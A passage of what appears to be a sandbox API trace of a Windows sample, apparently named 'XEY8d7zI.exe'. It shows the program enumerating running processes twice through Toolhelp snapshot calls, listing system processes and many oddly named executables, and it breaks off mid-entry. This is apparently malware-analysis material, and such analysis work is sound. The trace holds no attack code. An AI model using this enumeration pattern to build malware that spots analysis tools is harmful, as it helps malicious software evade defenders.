Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0130.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.814] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0130.815] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.817] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.818] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0130.819] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0130.820] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0130.821] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.823] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.824] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0130.826] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0130.827] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0130.828] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0130.829] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0130.926] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0130.927] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0130.929] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0130.930] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0130.932] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0130.933] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0130.934] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0130.936] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0130.937] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0130.939] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0130.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0130.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0130.943] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0130.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0130.945] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0130.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.948] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0130.949] CloseHandle (hObject=0xc4) returned 1 [0130.949] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0130.955] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.956] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0130.957] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0130.958] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.959] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0130.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.960] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0130.961] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0130.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0130.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0130.963] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0130.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0130.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0130.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0130.993] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0130.995] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.996] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.997] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0130.998] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0130.999] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0131.001] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0131.003] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0131.004] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0131.005] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0131.006] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0131.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0131.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0131.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0131.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0131.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0131.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0131.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0131.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0131.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0131.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0131.018] Process32NextW 